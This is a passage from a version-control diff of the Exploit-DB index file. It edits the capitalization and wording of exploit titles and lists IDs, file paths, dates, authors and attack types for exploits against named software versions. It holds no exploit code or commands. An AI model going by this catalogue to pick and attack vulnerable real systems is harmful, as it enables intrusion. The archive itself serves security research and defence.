rod",php,webapps,0 20550,platforms/php/webapps/20550.txt,"ProQuiz 2.0.2 - Cross-Site Request Forgery",2012-08-16,DaOne,php,webapps,0 20551,platforms/linux/remote/20551.pl,"E-Mail Security Virtual Appliance (ESVA) - Remote Execution",2012-08-16,iJoo,linux,remote,0 -20552,platforms/windows/dos/20552.html,"Microsoft Internet Explorer 4.0 / Outlook 2000/5.5 - MSHTML.dll Crash",2001-01-15,"Thor Larholm",windows,dos,0 +20552,platforms/windows/dos/20552.html,"Microsoft Internet Explorer 4 / Outlook 2000/5.5 - MSHTML.dll Crash",2001-01-15,"Thor Larholm",windows,dos,0 20553,platforms/windows/remote/20553.html,"Microsoft Windows Media Player 7.0 - '.wmz' Arbitrary Java Applet",2001-01-15,"Georgi Guninski",windows,remote,0 20554,platforms/linux/local/20554.sh,"SuSE 6.x/7.0 - MkDir Error Handling rctab Race Condition (1)",2001-01-13,IhaQueR,linux,local,0 20555,platforms/linux/local/20555.sh,"SuSE 6.x/7.0 - MkDir Error Handling rctab Race Condition (2)",2001-01-13,IhaQueR,linux,local,0 20556,platforms/linux/local/20556.c,"Debian Linux 2.2 - splitvt Format String",2001-01-16,"Michel Kaempf",linux,local,0 -20557,platforms/windows/remote/20557.pl,"Omnicron OmniHTTPD 2.0.7 - File Corruption / Command Execution",2001-08-01,"Joe Testa",windows,remote,0 +20557,platforms/windows/remote/20557.pl,"Omnicron OmniHTTPd 2.0.7 - File Corruption / Command Execution",2001-08-01,"Joe Testa",windows,remote,0 20558,platforms/multiple/dos/20558.txt,"Apache 1.2 Web Server - Denial of Service",1997-12-30,"Michal Zalewski",multiple,dos,0 20559,platforms/windows/remote/20559.c,"tinyproxy tinyproxy 1.3.2/1.3.3 - Heap Overflow",2001-01-17,CyRaX,windows,remote,0 20560,platforms/unix/local/20560.c,"SSH 1.2.x - Secure-RPC Weak Encrypted Authentication",2001-01-16,"Richard Silverman",unix,local,0 @@ -17907,10 +17908,10 @@ id,file,description,date,author,platform,type,port 20582,platforms/windows/remote/20582.c,"Icecast 1.3.7/1.3.8 - print_client() Format String",2001-01-21,CyRaX,windows,remote,0 20583,platforms/cgi/remote/20583.pl,"textcounter.pl 1.2 - Arbitrary Command Execution",1998-06-24,"Doru Petrescu",cgi,remote,0 20584,platforms/windows/remote/20584.txt,"fastream ftp++ 2.0 - Directory Traversal",2001-01-22,"SNS Research",windows,remote,0 -20585,platforms/windows/local/20585.txt,"localweb2000 1.1 - Directory Traversal",2001-01-22,"SNS Research",windows,local,0 +20585,platforms/windows/local/20585.txt,"LocalWEB2000 1.1 - Directory Traversal",2001-01-22,"SNS Research",windows,local,0 20586,platforms/php/webapps/20586.txt,"Phorum 3.0.7 - admin.php3 Unverified Administrative Password Change",2000-01-06,"Max Vision",php,webapps,0 20587,platforms/php/webapps/20587.txt,"Phorum 3.0.7 - violation.php3 Arbitrary Email Relay",2000-01-01,"Max Vision",php,webapps,0 -20588,platforms/php/webapps/20588.txt,"Phorum 3.0.7 - auth.php3 Backdoor Vulnerabililty",2000-01-06,"Max Vision",php,webapps,0 +20588,platforms/php/webapps/20588.txt,"Phorum 3.0.7 - auth.php3 Backdoor",2000-01-06,"Max Vision",php,webapps,0 20589,platforms/windows/dos/20589.c,"eEye Digital Security IRIS 1.0.1 - GET Denial of Service",2001-01-21,grazer,windows,dos,0 20590,platforms/windows/remote/20590.txt,"Microsoft IIS 3.0/4.0 - Upgrade BDIR.HTR",1998-12-25,"rain forest puppy",windows,remote,0 20591,platforms/multiple/remote/20591.txt,"Netscape Enterprise Server 3.0/4.0 - 'Index' Disclosure",2001-01-24,"Security Research Team",multiple,remote,0 @@ -17927,13 +17928,13 @@ id,file,description,date,author,platform,type,port 20602,platforms/solaris/remote/20602.c,"Solaris x86 2.4/2.5 - nlps_server Buffer Overflow",1998-04-01,"Last Stage of Delirium",solaris,remote,0 20603,platforms/solaris/local/20603.c,"Solaris 7/8 - ximp40 Library Buffer Overflow",2001-01-31,UNYUN,solaris,local,0 20604,platforms/linux/local/20604.sh,"Debian 2.2 / S.u.S.E 6.3/6.4/7.0 - man -l Format String",2001-01-31,IhaQueR,linux,local,0 -20605,platforms/windows/remote/20605.cpp,"Apple Quicktime plugin - Windows 4.1.2 (Japanese) Remote Overflow",2012-08-18,UNYUN,windows,remote,0 +20605,platforms/windows/remote/20605.cpp,"Apple QuickTime plugin - Windows 4.1.2 (Japanese) Remote Overflow",2012-08-18,UNYUN,windows,remote,0 20606,platforms/cgi/remote/20606.pl,"qDecoder 4.x/5.x - Remote Buffer Overflow",2000-03-26,"Jin Ho You",cgi,remote,0 -20607,platforms/windows/remote/20607.txt,"goahead webserver 2.0/2.1 - Directory Traversal",2001-02-02,"Sergey Nenashev",windows,remote,0 +20607,platforms/windows/remote/20607.txt,"goahead WebServer 2.0/2.1 - Directory Traversal",2001-02-02,"Sergey Nenashev",windows,remote,0 20608,platforms/windows/remote/20608.txt,"guido frassetto sedum http server 2.0 - Directory Traversal",2001-02-04,"Joe Testa",windows,remote,0 20609,platforms/cgi/remote/20609.txt,"Heat-On HSWeb Web Server 2.0 - Full Path Disclosure",2001-02-04,"Joe Testa",cgi,remote,0 20610,platforms/multiple/dos/20610.txt,"Allaire JRun 3.0 Servlet - Denial of Service",2000-10-31,"Allaire Security",multiple,dos,0 -20611,platforms/cgi/remote/20611.txt,"anaconda foundation 1.4-1.9 - Directory Traversal",2000-10-13,pestilence,cgi,remote,0 +20611,platforms/cgi/remote/20611.txt,"anaconda Foundation 1.4-1.9 - Directory Traversal",2000-10-13,pestilence,cgi,remote,0 20614,platforms/windows/remote/20614.txt,"aolserver 3.2 Win32 - Directory Traversal",2001-02-06,joetesta,windows,remote,0 20615,platforms/unix/remote/20615.txt,"SSH 1.2.30 - Daemon Logging Failure",2001-02-05,"Jose Nazario",unix,remote,0 20616,platforms/windows/remote/20616.txt,"soft lite serverworx 3.0 - Directory Traversal",2001-02-07,joetesta,windows,remote,0 @@ -17955,10 +17956,10 @@ id,file,description,date,author,platform,type,port 20632,platforms/cgi/remote/20632.txt,"PALS Library System WebPALS 1.0 - pals-cgi Arbitrary Command Execution",2001-02-02,cuctema,cgi,remote,0 20633,platforms/cgi/remote/20633.txt,"Brightstation Muscat 1.0 - Full Path Disclosure",2001-02-12,cuctema,cgi,remote,0 20634,platforms/windows/dos/20634.txt,"John Roy Pi3Web 1.0.1 - Buffer Overflow",2001-02-15,joetesta,windows,dos,0 -20635,platforms/multiple/remote/20635.txt,"caucho technology resin 1.2 - Directory Traversal",2001-02-16,joetesta,multiple,remote,0 +20635,platforms/multiple/remote/20635.txt,"caucho Technology resin 1.2 - Directory Traversal",2001-02-16,joetesta,multiple,remote,0 20636,platforms/linux/remote/20636.txt,"thinking arts es.one 1.0 - Directory Traversal",2001-02-16,slipy,linux,remote,0 20637,platforms/windows/remote/20637.txt,"itafrica webactive 1.0 - Directory Traversal",2001-02-16,slipy,windows,remote,0 -20638,platforms/multiple/remote/20638.txt,"Bajie Webserver 0.78/0.90 - Remote Command Execution",2001-02-15,joetesta,multiple,remote,0 +20638,platforms/multiple/remote/20638.txt,"Bajie WebServer 0.78/0.90 - Remote Command Execution",2001-02-15,joetesta,multiple,remote,0 20639,platforms/multiple/remote/20639.txt,"Bajie 0.78 - Arbitrary Shell Command Execution",2001-02-15,joetesta,multiple,remote,0 20640,platforms/windows/remote/20640.txt,"Working Resources BadBlue 1.2.7 - Full Path Disclosure",2001-02-20,"SNS Research",windows,remote,0 20641,platforms/windows/dos/20641.txt,"Working Resources BadBlue 1.2.7 - Denial of Service",2001-02-20,"SNS Research",windows,dos,0 @@ -17982,10 +17983,10 @@ id,file,description,date,author,platform,type,port 20660,platforms/unix/remote/20660.txt,"KICQ 1.0 - Arbitrary Command Execution",2001-02-14,"Marc Roessler",unix,remote,0 20661,platforms/windows/remote/20661.txt,"jarle aase war ftpd 1.67 b04 - Directory Traversal",2001-03-06,se00020,windows,remote,0 20662,platforms/windows/dos/20662.txt,"WhitSoft SlimServe - HTTPD 1.1 Get Denial of Service",2001-02-28,joetesta,windows,dos,0 -20663,platforms/windows/remote/20663.txt,"WhitSoft slimserve ftpd 1.0/2.0 - Directory Traversal",2001-02-28,joetesta,windows,remote,0 +20663,platforms/windows/remote/20663.txt,"WhitSoft SlimServe ftpd 1.0/2.0 - Directory Traversal",2001-02-28,joetesta,windows,remote,0 20664,platforms/windows/dos/20664.pl,"Microsoft IIS 5.0 - WebDAV Denial of Service",2001-03-08,"Georgi Guninski",windows,dos,0 20665,platforms/php/webapps/20665.txt,"T-dah Webmail - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-08-20,"Yakir Wizman",php,webapps,0 -20666,platforms/php/webapps/20666.html,"ClipBucket 2.5 - Cross-Site Request Forgery",2012-08-20,DaOne,php,webapps,0 +20666,platforms/php/webapps/20666.html,"Clipbucket 2.5 - Cross-Site Request Forgery",2012-08-20,DaOne,php,webapps,0 20667,platforms/hardware/webapps/20667.txt,"Alpha Networks ADSL2/2+ Wireless Router ASL-26555 - Password Disclosure",2012-08-20,"Alberto Ortega",hardware,webapps,0 20668,platforms/java/webapps/20668.py,"hupa webmail 0.0.2 - Persistent Cross-Site Scripting",2012-08-20,"Shai rod",java,webapps,0 20669,platforms/php/webapps/20669.py,"GWebmail 0.7.3 - Cross-Site Scripting / Local File Inclusion / Remote Code Execution",2012-08-20,"Shai rod",php,webapps,0 @@ -17994,7 +17995,7 @@ id,file,description,date,author,platform,type,port 20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance - learn-msg.cgi Command Injection",2012-08-22,Metasploit,cgi,webapps,0 20671,platforms/php/webapps/20671.html,"PG Portal Pro - Cross-Site Request Forgery",2012-08-20,Noxious,php,webapps,0 20672,platforms/php/webapps/20672.py,"Hivemail Webmail - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 -20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - (index.php id parameter) SQL Injection",2012-08-20,DaOne,php,webapps,0 +20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - (index.php id Parameter) SQL Injection",2012-08-20,DaOne,php,webapps,0 20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary PHP File Upload",2012-08-22,Metasploit,php,webapps,0 20675,platforms/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Persistent Cross-Site Scripting",2012-08-20,"Shai rod",php,webapps,0 20677,platforms/windows/webapps/20677.txt,"IOServer 1.0.18.0 - Directory Traversal",2012-08-20,hinge,windows,webapps,0 @@ -18003,9 +18004,9 @@ id,file,description,date,author,platform,type,port 20680,platforms/windows/remote/20680.html,"Microsoft Internet Explorer 5.0.1/5.5/6.0 - Telnet Client File Overwrite",2001-03-09,"Oliver Friedrichs",windows,remote,0 20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - Denial of Service",2001-01-22,honoriak,windows,dos,0 20682,platforms/windows/dos/20682.txt,"Michael Lamont Savant Web Server 3.0 - Denial of Service",2001-03-09,Phiber,windows,dos,0 -20683,platforms/cgi/remote/20683.txt,"Ikonboard 2.1.7b - Remote File Disclosure",2001-03-11,"Martin J. Muench",cgi,remote,0 +20683,platforms/cgi/remote/20683.txt,"IkonBoard 2.1.7b - Remote File Disclosure",2001-03-11,"Martin J. Muench",cgi,remote,0 20684,platforms/solaris/local/20684.c,"Solaris 2.5/2.6/7.0/8 tip - Buffer Overflow",2001-03-27,"Pablo Sor",solaris,local,0 -20685,platforms/multiple/remote/20685.txt,"IBM Net.Commerce 3.1/3.2 WebSphere - Weak Password",2001-03-07,"Rudi Carell",multiple,remote,0 +20685,platforms/multiple/remote/20685.txt,"IBM Net.Commerce 3.1/3.2 Websphere - Weak Password",2001-03-07,"Rudi Carell",multiple,remote,0 20686,platforms/cgi/remote/20686.txt,"Free Online Dictionary of Computing 1.0 - Remote File Viewing",2001-03-09,Cgisecurity,cgi,remote,0 20687,platforms/windows/remote/20687.txt,"OReilly Software WebSite Professional 2.5.4 - Directory Disclosure",2001-03-16,"Roberto Moreno",windows,remote,0 20688,platforms/windows/remote/20688.txt,"Qualcomm Eudora 5.0.2 - 'Use Microsoft Viewer' Code Execution",2001-03-18,http-equiv,windows,remote,0 @@ -18025,7 +18026,7 @@ id,file,description,date,author,platform,type,port 20714,platforms/cgi/remote/20714.txt,"anaconda clipper 3.3 - Directory Traversal",2001-03-27,"UkR hacking team",cgi,remote,0 20715,platforms/solaris/local/20715.txt,"Junsoft JSparm 4.0 - Logging Output File",2001-03-23,KimYongJun,solaris,local,0 20716,platforms/windows/remote/20716.txt,"Apache Tomcat 3.0 - Directory Traversal",2001-03-28,lovehacker,windows,remote,0 -20717,platforms/windows/remote/20717.txt,"elron im anti-virus 3.0.3 - Directory Traversal",2001-03-23,"Erik Tayler",windows,remote,0 +20717,platforms/windows/remote/20717.txt,"elron im Anti-Virus 3.0.3 - Directory Traversal",2001-03-23,"Erik Tayler",windows,remote,0 20718,platforms/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 - Root Operation Symbolic Link File Overwriting",2001-03-18,lesha,unix,local,0 20719,platforms/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0 / Weblogic Server 5.1 - URL JSP Request Source Code Disclosure",2001-03-28,"Sverre H. Huseby",multiple,remote,0 20720,platforms/linux/local/20720.c,"Linux Kernel 2.2.18 (RedHat 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1)",2001-03-27,"Wojciech Purczynski",linux,local,0 @@ -18058,7 +18059,7 @@ id,file,description,date,author,platform,type,port 20747,platforms/linux/dos/20747.txt,"Oracle Application Server 4.0.8.2 - ndwfn4.so Buffer Overflow",2001-04-11,"Fyodor Yarochkin",linux,dos,0 20748,platforms/linux/remote/20748.pl,"cfingerd 1.4 - Format String (1)",2001-04-11,Lez,linux,remote,0 20749,platforms/linux/remote/20749.c,"cfingerd 1.4 - Format String (2)",2001-04-16,VeNoMouS,linux,remote,0 -20750,platforms/linux/dos/20750.txt,"Trend Micro Interscan Viruswall (Linux) 3.0.1 - Multiple Program Buffer Overflow",2001-04-13,"eeye security",linux,dos,0 +20750,platforms/linux/dos/20750.txt,"Trend Micro Interscan VirusWall (Linux) 3.0.1 - Multiple Program Buffer Overflow",2001-04-13,"eeye security",linux,dos,0 20751,platforms/solaris/local/20751.txt,"Solaris 7.0/8 - IPCS Timezone Buffer Overflow",2001-04-12,"Riley Hassell",solaris,local,0 20752,platforms/cgi/remote/20752.txt,"NCM Content Management System - content.pl Input Validation",2001-04-13,"RA-Soft Security",cgi,remote,0 20753,platforms/cgi/dos/20753.txt,"IBM Websphere/Net.Commerce 3 - CGI-BIN Macro Denial of Service",2001-04-13,"ET LoWNOISE",cgi,dos,0 @@ -18075,7 +18076,7 @@ id,file,description,date,author,platform,type,port 20767,platforms/solaris/local/20767.c,"Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (1)",1999-12-01,"Last Stage of Delirium",solaris,local,0 20768,platforms/solaris/local/20768.c,"Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (2)",1999-12-01,"Last Stage of Delirium",solaris,local,0 20769,platforms/unix/local/20769.txt,"Siemens Reliant UNIX 5.4 - ppd -T Race Condition",2001-04-14,"Ruiz Garcia",unix,local,0 -20770,platforms/windows/dos/20770.txt,"GoAhead Software GoAhead Webserver (Windows) 2.1 - Denial of Service",2001-04-17,nemesystm,windows,dos,0 +20770,platforms/windows/dos/20770.txt,"GoAhead Software GoAhead WebServer (Windows) 2.1 - Denial of Service",2001-04-17,nemesystm,windows,dos,0 20771,platforms/windows/dos/20771.txt,"Simpleserver WWW 1.0.x - AUX Directory Denial of Service",2001-04-17,nemesystm,windows,dos,0 20772,platforms/solaris/local/20772.c,"Solaris 2.5/2.6/7.0/8 - mailx -F Buffer Overflow (1)",2001-04-01,"Pablo Sor",solaris,local,0 20773,platforms/solaris/local/20773.c,"Solaris 2.5/2.6/7.0/8 - mailx -F Buffer Overflow (2)",2001-04-15,"Pablo Sor",solaris,local,0 @@ -18094,14 +18095,14 @@ id,file,description,date,author,platform,type,port 20787,platforms/php/webapps/20787.txt,"Text Exchange Pro - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 20788,platforms/php/webapps/20788.txt,"AB Banner Exchange - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 20789,platforms/php/webapps/20789.txt,"Easy Banner Pro - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 -20790,platforms/php/webapps/20790.py,"businesswiki 2.5rc3 - Persistent Cross-Site Scripting / arbitrary file upload",2012-08-24,"Shai rod",php,webapps,0 +20790,platforms/php/webapps/20790.py,"businesswiki 2.5rc3 - Persistent Cross-Site Scripting / Arbitrary file upload",2012-08-24,"Shai rod",php,webapps,0 20791,platforms/unix/remote/20791.php,"Netscape Navigator 4.0.8 - 'about:' Domain Information Disclosure",2001-04-09,"Florian Wesch",unix,remote,0 20792,platforms/multiple/dos/20792.txt,"Mercury/NLM 1.4 - Buffer Overflow",2001-04-21,"Przemyslaw Frasunek",multiple,dos,0 20793,platforms/windows/remote/20793.txt,"RobTex Viking Server 1.0.7 - Relative Path Webroot Escaping",2001-04-23,joetesta,windows,remote,0 20794,platforms/windows/remote/20794.c,"WFTPD 3.0 - 'RETR' and 'CWD' Buffer Overflow",2001-04-22,"Len Budney",windows,remote,0 20795,platforms/linux/local/20795.sh,"Sendfile 1.x/2.1 - Local Privileged Arbitrary Command Execution",2001-04-24,psheep,linux,local,0 20796,platforms/linux/remote/20796.rb,"Zabbix Server - Arbitrary Command Execution",2012-08-27,Metasploit,linux,remote,0 -20797,platforms/multiple/remote/20797.txt,"Perl Web Server 0.x - Path Traversal",2001-04-24,neme-dhc,multiple,remote,0 +20797,platforms/multiple/remote/20797.txt,"Perl Web Server 0.x - Directory Traversal",2001-04-24,neme-dhc,multiple,remote,0 20798,platforms/linux/local/20798.sh,"Sendfile 1.x/2.1 - Forced Privilege Lowering Failure",2001-04-24,"Cade Cairns",linux,local,0 20799,platforms/cgi/remote/20799.c,"PowerScripts PlusMail WebConsole 1.0 - Poor Authentication (1)",2000-01-11,"Synnergy Networks",cgi,remote,0 20800,platforms/cgi/remote/20800.c,"PowerScripts PlusMail WebConsole 1.0 - Poor Authentication (2)",2000-01-11,missnglnk,cgi,remote,0 @@ -18119,11 +18120,11 @@ id,file,description,date,author,platform,type,port 20812,platforms/windows/dos/20812.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3)",1997-11-20,m3lt,windows,dos,0 20813,platforms/multiple/dos/20813.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4)",1997-11-20,MondoMan,multiple,dos,0 20814,platforms/windows/dos/20814.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5)",1997-11-20,"Dejan Levaja",windows,dos,0 -20815,platforms/windows/remote/20815.pl,"Microsoft IIS 5.0 - (.printer) ISAPI Extension Buffer Overflow (1)",2001-05-01,storm,windows,remote,0 -20816,platforms/windows/remote/20816.c,"Microsoft IIS 5.0 - (.printer) ISAPI Extension Buffer Overflow (2)",2001-05-01,"dark spyrit",windows,remote,0 -20817,platforms/windows/remote/20817.c,"Microsoft IIS 5.0 - (.printer) ISAPI Extension Buffer Overflow (3)",2005-02-02,styx,windows,remote,0 -20818,platforms/windows/remote/20818.txt,"Microsoft IIS 5.0 - (.printer) ISAPI Extension Buffer Overflow (4)",2001-05-01,"Cyrus The Great",windows,remote,0 -20819,platforms/windows/remote/20819.txt,"BRS WebWeaver 0.x - FTP Root Full Path Disclosure",2001-04-28,joetesta,windows,remote,0 +20815,platforms/windows/remote/20815.pl,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (1)",2001-05-01,storm,windows,remote,0 +20816,platforms/windows/remote/20816.c,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (2)",2001-05-01,"dark spyrit",windows,remote,0 +20817,platforms/windows/remote/20817.c,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (3)",2005-02-02,styx,windows,remote,0 +20818,platforms/windows/remote/20818.txt,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (4)",2001-05-01,"Cyrus The Great",windows,remote,0 +20819,platforms/windows/remote/20819.txt,"BRS Webweaver 0.x - FTP Root Full Path Disclosure",2001-04-28,joetesta,windows,remote,0 20820,platforms/windows/remote/20820.c,"Nullsoft Winamp 2.x - AIP Buffer Overflow",2001-04-29,byterage,windows,remote,0 20821,platforms/hardware/dos/20821.txt,"Cisco HSRP - Denial of Service",2001-05-03,bashis,hardware,dos,0 20822,platforms/linux/local/20822.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (1)",2001-05-07,"Sebastian Krahmer",linux,local,0 @@ -18158,13 +18159,13 @@ id,file,description,date,author,platform,type,port 20851,platforms/sco/local/20851.txt,"SCO OpenServer 5.0.x - StartX Weak XHost Permissions",2001-05-07,"Richard Johnson",sco,local,0 20852,platforms/multiple/dos/20852.pl,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (1)",2001-05-15,"Santi Claus",multiple,dos,0 20853,platforms/multiple/dos/20853.php,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (2)",2001-05-15,"Gabriel Maggiotti",multiple,dos,0 -20854,platforms/windows/dos/20854.txt,"IIS 5.0 - WebDav Lock Method Memory Leak Denial of Service",2001-05-17,"Defcom Labs",windows,dos,0 +20854,platforms/windows/dos/20854.txt,"Microsoft IIS 5.0 - WebDav Lock Method Memory Leak Denial of Service",2001-05-17,"Defcom Labs",windows,dos,0 20855,platforms/php/webapps/20855.txt,"Wiki Web Help 0.3.9 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0 20856,platforms/php/webapps/20856.txt,"XWiki 4.2-milestone-2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0 20857,platforms/php/webapps/20857.txt,"web@all CMS 2.0 - Multiple Vulnerabilities",2012-08-27,LiquidWorm,php,webapps,0 -20859,platforms/php/webapps/20859.txt,"vlinks 2.0.3 - (site.php id parameter) SQL Injection",2012-08-27,JIKO,php,webapps,0 -20861,platforms/win_x86-64/local/20861.txt,"Microsoft Windows Kernel - Intel x64 SYSRET (PoC)",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local,0 -20862,platforms/php/webapps/20862.txt,"Wordpress Count per Day Plugin 3.2.3 - Cross-Site Scripting",2012-08-27,Crim3R,php,webapps,0 +20859,platforms/php/webapps/20859.txt,"vlinks 2.0.3 - (site.php id Parameter) SQL Injection",2012-08-27,JIKO,php,webapps,0 +20861,platforms/win_x86-64/local/20861.txt,"Microsoft Windows - Kernel Intel x64 SYSRET (PoC)",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local,0 +20862,platforms/php/webapps/20862.txt,"WordPress Count per Day Plugin 3.2.3 - Cross-Site Scripting",2012-08-27,Crim3R,php,webapps,0 20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 - (products_name_de) Script Insertion",2012-08-27,LiquidWorm,php,webapps,0 20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 - Community Manager Insecure File Upload",2012-08-27,"Sense of Security",asp,webapps,0 20865,platforms/java/remote/20865.rb,"Java 7 Applet - Remote Code Execution",2012-08-27,Metasploit,java,remote,0 @@ -18174,7 +18175,7 @@ id,file,description,date,author,platform,type,port 20869,platforms/multiple/remote/20869.html,"eSafe Gateway 2.1 - Script-filtering Bypass",2001-05-20,"eDvice Security Services",multiple,remote,0 20870,platforms/windows/dos/20870.pl,"Express Burn Plus 4.58 - EBP Project File Handling Buffer Overflow (PoC)",2012-08-28,LiquidWorm,windows,dos,0 20871,platforms/php/webapps/20871.txt,"CommPort 1.01 - Multiple Vulnerabilities",2012-08-28,"Jean Pascal Pereira",php,webapps,0 -20872,platforms/php/webapps/20872.txt,"mieric addressBook 1.0 - SQL Injection",2012-08-28,"Jean Pascal Pereira",php,webapps,0 +20872,platforms/php/webapps/20872.txt,"mieric AddressBook 1.0 - SQL Injection",2012-08-28,"Jean Pascal Pereira",php,webapps,0 20873,platforms/php/webapps/20873.html,"RV Article Publisher - Cross-Site Request Forgery",2012-08-28,DaOne,php,webapps,0 20874,platforms/php/webapps/20874.html,"RV Shopping Cart - Cross-Site Request Forgery",2012-08-28,DaOne,php,webapps,0 20876,platforms/windows/remote/20876.pl,"Simple Web Server 2.2-rc2 - ASLR Bypass Exploit",2012-08-28,pole,windows,remote,0 @@ -18183,18 +18184,18 @@ id,file,description,date,author,platform,type,port 20879,platforms/unix/remote/20879.txt,"OpenServer 5.0.5/5.0.6 / HP-UX 10/11 / Solaris 2.6/7.0/8 - rpc.yppasswdd Buffer Overrun",2001-05-10,metaray,unix,remote,0 20880,platforms/windows/local/20880.c,"Microsoft Windows 2000 - Debug Registers",2001-05-24,"Georgi Guninski",windows,local,0 20881,platforms/multiple/remote/20881.txt,"Beck IPC GmbH IPC@CHIP - TelnetD Login Account Brute Force",2001-05-24,"Courtesy Sentry Research Labs",multiple,remote,0 -20882,platforms/multiple/remote/20882.txt,"faust informatics freestyle chat 4.1 sr2 - Directory Traversal",2001-05-25,nemesystm,multiple,remote,0 -20883,platforms/windows/dos/20883.txt,"Faust Informatics Freestyle Chat 4.1 SR2 MS-DOS Device Name - Denial of Service",2001-05-25,nemesystm,windows,dos,0 +20882,platforms/multiple/remote/20882.txt,"faust Informatics FreeStyle chat 4.1 sr2 - Directory Traversal",2001-05-25,nemesystm,multiple,remote,0 +20883,platforms/windows/dos/20883.txt,"Faust Informatics FreeStyle Chat 4.1 SR2 MS-DOS Device Name - Denial of Service",2001-05-25,nemesystm,windows,dos,0 20884,platforms/windows/remote/20884.txt,"ACLogic CesarFTP 0.98b - Directory Traversal",2001-05-27,byterage,windows,remote,0 20885,platforms/solaris/local/20885.c,"Solaris 8 mailtool - Buffer Overflow",2001-06-01,51,solaris,local,0 -20886,platforms/windows/remote/20886.txt,"Omnicron OmniHTTPD 2.0.4-8 - File Source Disclosure",2001-05-26,astral,windows,remote,0 +20886,platforms/windows/remote/20886.txt,"Omnicron OmniHTTPd 2.0.4-8 - File Source Disclosure",2001-05-26,astral,windows,remote,0 20887,platforms/cgi/remote/20887.txt,"Cosmicperl Directory Pro 2.0 - Arbitrary File Disclosure",2001-05-28,Marshal,cgi,remote,0 20888,platforms/windows/remote/20888.txt,"Qualcomm Eudora 5.1 - Hidden Attachment Execution",2001-05-29,http-equiv,windows,remote,0 20889,platforms/multiple/remote/20889.txt,"GNU Privacy Guard 1.0.x - Format String",2001-05-29,"fish stiqz",multiple,remote,0 20890,platforms/multiple/remote/20890.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 - HTML tag Script-filtering Bypass",2001-05-29,"eDvice Security Services",multiple,remote,0 20891,platforms/multiple/remote/20891.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 - Unicode Script-filtering Bypass",2001-05-29,"eDvice Security Services",multiple,remote,0 20892,platforms/hardware/remote/20892.txt,"Olicom XLT-F XL 80 IM V5.5BL2 - Undocumented Community String",2001-03-25,"Jacek Lipkowski",hardware,remote,0 -20893,platforms/windows/remote/20893.txt,"Trend Micro InterScan VirusWall for Windows NT 3.4/3.5/3.51 - Remote Reconfiguration",2001-05-24,snsadv,windows,remote,0 +20893,platforms/windows/remote/20893.txt,"Trend Micro Interscan VirusWall for Windows NT 3.4/3.5/3.51 - Remote Reconfiguration",2001-05-24,snsadv,windows,remote,0 20894,platforms/multiple/remote/20894.txt,"Acme.Serve 1.7 - Arbitrary File Access",2001-05-31,"Adnan Rahman",multiple,remote,0 20895,platforms/cgi/remote/20895.txt,"WebTrends Enterprise Reporting Server 3.1 c/3.5 - Source Code Disclosure",2001-06-03,"Auriemma Luigi",cgi,remote,0 20896,platforms/windows/remote/20896.txt,"OReilly Software WebBoard 4.10.30 - Pager Hostile JavaScript",2001-06-02,"Helmuth Antholzer",windows,remote,0 @@ -18213,13 +18214,13 @@ id,file,description,date,author,platform,type,port 20909,platforms/multiple/remote/20909.txt,"IBM Tivoli NetView 5/6 - OVActionD SNMPNotify Command Execution",2001-06-08,"Milo van der Zee",multiple,remote,0 20910,platforms/windows/remote/20910.pl,"TransSoft Broker FTP Server 3.0/4.0/4.7/5.x - CWD Buffer Overflow",2001-06-10,byterage,windows,remote,0 20911,platforms/osx/remote/20911.txt,"Apache 1.3.14 - Mac File Protection Bypass",2001-06-10,"Stefan Arentz",osx,remote,0 -20912,platforms/windows/remote/20912.txt,"Trend Micro InterScan VirusWall for Windows NT 3.51 - Configurations Modification",2001-06-12,"SNS Advisory",windows,remote,0 +20912,platforms/windows/remote/20912.txt,"Trend Micro Interscan VirusWall for Windows NT 3.51 - Configurations Modification",2001-06-12,"SNS Advisory",windows,remote,0 20913,platforms/php/webapps/20913.txt,"Disqus Blog Comments - Blind SQL Injection",2012-08-29,Spy_w4r3,php,webapps,0 20914,platforms/cgi/remote/20914.pl,"cgiCentral WebStore 400 - Administrator Authentication Bypass",2001-05-06,"Igor Dobrovitski",cgi,remote,0 